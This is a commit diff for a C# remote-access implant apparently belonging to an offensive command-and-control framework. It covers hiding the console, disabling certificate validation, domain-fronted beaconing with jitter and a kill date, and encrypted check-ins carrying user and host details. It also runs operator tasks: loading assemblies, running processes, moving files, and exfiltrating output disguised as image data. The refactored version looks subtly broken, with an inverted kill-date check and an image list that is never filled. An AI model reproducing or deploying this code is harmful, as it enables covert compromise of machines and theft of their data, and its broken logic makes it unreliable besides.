Update sharp.cs

[+] use of ManualResetEvents instead of Thread.Sleep
[+] Add Jitter to beacontime
[+] General tidy up
chunking
rolen 2019-01-03 18:33:10 +00:00
parent 782429387f
commit 205d4f3693
1 changed files with 432 additions and 493 deletions

View File

@ -16,519 +16,458 @@ using System.Collections.Generic;
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe";
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe";
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch { }
Thread.Sleep(300000);
try { primer(); } catch { }
Thread.Sleep(600000);
try { primer(); } catch { }
}
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch { }
var mre = new System.Threading.ManualResetEvent(false);
mre.WaitOne(300000);
try { primer(); } catch { }
mre.WaitOne(600000);
try { primer(); } catch { }
}
public static void Main()
{
Sharp();
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
public static void Main()
{
Sharp();
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
string df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) {
x.Headers.Add("Host",df);
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
var purl = "#REPLACEPROXYURL#";
var puser = "#REPLACEPROXYUSER#";
var ppass = "#REPLACEPROXYPASSWORD#";
if (cookie != null)
{
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x;
}
if (!String.IsNullOrEmpty(purl))
{
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
var df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df))
x.Headers.Add("Host", df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
{
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
return x;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
var IV = new Byte[16];
Array.Copy(b, IV, 16);
try
{
var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
catch
{
var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
static void primer()
{
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
//Console.ReadLine();
} else {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
byte[] byEnc = null;
if (unByte != null)
byEnc = unByte;
else
byEnc = System.Text.Encoding.UTF8.GetBytes(un);
}
if (comp)
byEnc = Compress(byEnc);
try
{
var a = CreateCam(key, null);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{
System.Security.Cryptography.SymmetricAlgorithm a = null;
if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
static byte[] Compress(byte[] raw)
{
using (MemoryStream memory = new MemoryStream())
{
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
if (null != IV)
a.IV = System.Convert.FromBase64String(IV);
else
a.GenerateIV();
static Random random = new Random();
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
if (null != key)
a.Key = System.Convert.FromBase64String(key);
static Type LoadSomething(string assemblyQualifiedName)
{
// Throws exception is type was not found
return Type.GetType(
assemblyQualifiedName,
(name) =>
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
return a;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
}
catch { }
}
string strURLS = stringURLS.Replace(",","");
strURLS = strURLS.Replace(" ","");
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
static void primer()
{
if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
{
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
string strIMGS = stringIMGS.Replace(",","");
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
var x = Decryption(key, primer);
int beacontime = 5;
if (!Int32.TryParse(Sleep, out beacontime))
{
beacontime = 5;
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
bool bExit = true;
while(bExit)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
bExit = false;
}
string output = "";
try {
string cmd = null;
string x = "";
string tasksrc = "";
try {
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
output = "";
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output += "Module loaded sucessfully";
tasksrc = "Module loaded sucessfully";
}
var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
var m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
if (c.ToLower().StartsWith("upload-file")){
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
byte[] fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
if (c.ToLower().StartsWith("download-file")){
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
byte[] file = File.ReadAllBytes(path.Replace("\"", ""));
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string dtask = Encryption(Key, c);
string dcoutput = Encryption(Key, "", true, fileChuck);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS);
GetWebRequest(dtask).UploadData(URL, dsendBytes);
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
output += "[+] Modules loaded: \n\n";
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower().StartsWith("$shellcode")){
string sc = c.Substring(13,c.Length - 13);
sc = sc.Replace("\"", "");
scode = sc;
}
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
foreach (string a in splitargs) {
if (i == 1){
qualifiedname = a;
}
if (i == 2){
name = a;
}
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
string[] splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
var myList = new List<string>();
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} else {
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null);
output = xxx.ToString();
}
}
} catch { }
}
}
}
if (c.ToLower().StartsWith("exit")){
bExit = false;
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
output += strOutput.ToString();
StringBuilder sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
if (tasksrc.Length > 200) {
tasksrc = tasksrc.Substring(0,199);
}
string task = Encryption(Key, tasksrc);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
}
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
}
static byte[] Compress(byte[] raw)
{
using (var memory = new MemoryStream())
using (var gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
return memory.ToArray();
}
}
static Type LoadSomething(string assemblyQualifiedName)
{
return Type.GetType(assemblyQualifiedName, (name) =>
{
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
}, null, true);
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
}
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
}
}
internal static class ImgGen
{
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
static List<String> _newImgs = new List<String>();
internal static void Init(String stringIMGS)
{
var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
}
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
internal static byte[] GetImgData(byte[] cmdoutput)
{
Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
if (!Int32.TryParse(Sleep, out int beacontime))
beacontime = 5;
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) > DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var dtask = Encryption(Key, c);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
}
else if (c.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
output.AppendLine(ass.FullName.ToString());
}
else if (c.ToLower().StartsWith("$shellcode"))
scode = c.Substring(13, c.Length - 13).Replace("\"", "");
else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
{
var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "", splittheseargs = "", qualifiedname = "", name = "";
foreach (var a in splitargs)
{
if (i == 1)
qualifiedname = a;
if (i == 2)
name = a;
if (c.ToLower().StartsWith("run-exe"))
if (i > 2)
splittheseargs = splittheseargs + " " + a;
else
if (i == 3)
method = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
output.AppendLine(loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString());
else
{
try
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString());
}
catch
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString());
}
}
}
catch { }
}
}
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
if (tasksrc.Length > 200)
tasksrc = tasksrc.Substring(0, 199);
var task = Encryption(Key, tasksrc);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
}